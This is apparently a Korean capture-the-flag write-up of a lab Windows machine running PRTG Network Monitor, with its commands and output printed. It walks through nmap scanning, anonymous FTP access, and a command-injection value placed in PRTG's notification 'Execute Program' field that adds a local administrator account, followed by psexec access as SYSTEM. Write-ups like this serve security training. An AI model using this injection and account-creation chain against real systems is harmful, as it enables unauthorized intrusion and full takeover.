1. 정찰
1.1. nmap
nmap 정찰 결과 21번 포트와 80번 포트 개방된 것이 눈에 띈다.
┌──(root㉿kali)-[/home/kali/labs/Netmon]
└─# nmap -sC -sV 10.129.230.176
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-30 10:13 +04
Nmap scan report for 10.129.230.176
Host is up (0.36s latency).
Not shown: 994 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-02-19 11:18PM 1024 .rnd
| 02-25-19 09:15PM <DIR> inetpub
| 07-16-16 08:18AM <DIR> PerfLogs
| 02-25-19 09:56PM <DIR> Program Files
| 02-02-19 11:28PM <DIR> Program Files (x86)
| 02-03-19 07:08AM <DIR> Users
|_11-10-23 09:20AM <DIR> Windows
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open tcpwrapped
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2025-12-30T06:13:49
|_ start_date: 2025-12-30T04:49:24
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 48.83 seconds
1.2. ftp 접근
Anonymous FTP login allowed 를 식별했으므로 익명 계정을 통해 접근을 시도한다.
┌──(root㉿kali)-[/home/kali/labs/Netmon]
└─# ftp 10.129.230.176
Connected to 10.129.230.176.
220 Microsoft FTP Service
Name (10.129.230.176:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp>
접근하면 Desktop 폴더에 접근이 가능해서 user.txt 파일까지 한 번에 수집할 수 있다.
ftp> ls
229 Entering Extended Passive Mode (|||50677|)
150 Opening ASCII mode data connection.
02-02-19 11:18PM 1024 .rnd
02-25-19 09:15PM <DIR> inetpub
07-16-16 08:18AM <DIR> PerfLogs
02-25-19 09:56PM <DIR> Program Files
02-02-19 11:28PM <DIR> Program Files (x86)
02-03-19 07:08AM <DIR> Users
11-10-23 09:20AM <DIR> Windows
226 Transfer complete.
ftp> cd Users
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||50680|)
125 Data connection already open; Transfer starting.
02-25-19 10:44PM <DIR> Administrator
01-15-24 10:03AM <DIR> Public
226 Transfer complete.
ftp> cd Public
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||50681|)
150 Opening ASCII mode data connection.
01-15-24 10:03AM <DIR> Desktop
02-03-19 07:05AM <DIR> Documents
07-16-16 08:18AM <DIR> Downloads
07-16-16 08:18AM <DIR> Music
07-16-16 08:18AM <DIR> Pictures
07-16-16 08:18AM <DIR> Videos
226 Transfer complete.
ftp> cd Desktop
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||50683|)
150 Opening ASCII mode data connection.
02-02-19 11:18PM 1195 PRTG Enterprise Console.lnk
02-02-19 11:18PM 1160 PRTG Network Monitor.lnk
12-29-25 11:50PM 34 user.txt
226 Transfer complete.
ftp> get user.txt
local: user.txt remote: user.txt
229 Entering Extended Passive Mode (|||50685|)
125 Data connection already open; Transfer starting.
100% |************************************************************************************************************************************************| 34 0.09 KiB/s 00:00 ETA
226 Transfer complete.
34 bytes received in 00:00 (0.09 KiB/s)
ftp> quit
221 Goodbye.
┌──(root㉿kali)-[/home/kali/labs/Netmon]
└─# cat user.txt
1.3. smb 공유 폴더 체크
smb 를 통해 접근을 시도했으나 가능한 경우의 수 대부분이 막혀서 더 이상 점검하지는 않았다.
┌──(root㉿kali)-[/home/kali/labs/Netmon]
└─# smbmap -H 10.129.230.176
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 0 authenticated session(s)
[!] Something weird happened on (10.129.230.176) Error occurs while reading from remote(104) on line 1015
[*] Closed 1 connections
┌──(root㉿kali)-[/home/kali/labs/Netmon]
└─# smbclient -N -L //10.129.230.176
session setup failed: NT_STATUS_ACCESS_DENIED
┌──(root㉿kali)-[/home/kali/labs/Netmon]
└─# rpcclient -U ""%"" 10.129.230.176
Cannot connect to server. Error was NT_STATUS_ACCESS_DENIED
2. 웹 정찰
2.1. 로그인 시도
로그인 크리덴셜은 어찌 잘 찾았다 치자. prtgadmin PrTg@dmin2019 로 로그인을 한다.
2.2. Notification 정찰
Notification 기능을 이용하면 커맨드 명령어를 입력할 수 있다. Execute Program 기능을 이용해서 test.txt;net user anon p3nT3st! /add;net localgroup administrators anon /add 을 실행한다. 그러면 anon 이라는 계정으로 administrator 그룹에 들어가게끔 만들 수 있다.
정상적으로 만들었으면 아래와 같이 클릭을 하고 맨 윗칸에 있는 종모양을 누르면 알람 테스트를 할 수 있다. 그 때 우리가 입력한 명령어가 실행된다.
알람 모양을 누르면 아래와 같이 나온다. OK 를 누른다.
3. 내부망 침투
3.1. anon 계정 이용 내부망 침투
위에서 만들어 놓은 관리자 권한의 anon 계정을 통해서 psexec 를 이용해 접근하면 SYSTEM 권한을 통해서 접근이 가능하다. 그걸 통해서 root.txt 를 통해 flag를 획득할 수 있다.
┌──(root㉿kali)-[/home/kali]
└─# impacket-psexec 'anon:p3nT3st!@10.129.230.176'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on 10.129.230.176.....
[*] Found writable share ADMIN$
[*] Uploading file luhdDqbf.exe
[*] Opening SVCManager on 10.129.230.176.....
[*] Creating service JAwL on 10.129.230.176.....
[*] Starting service JAwL.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> cd C:\
C:\> cd Users\Administrator\Desktop
C:\Users\Administrator\Desktop> type root.txt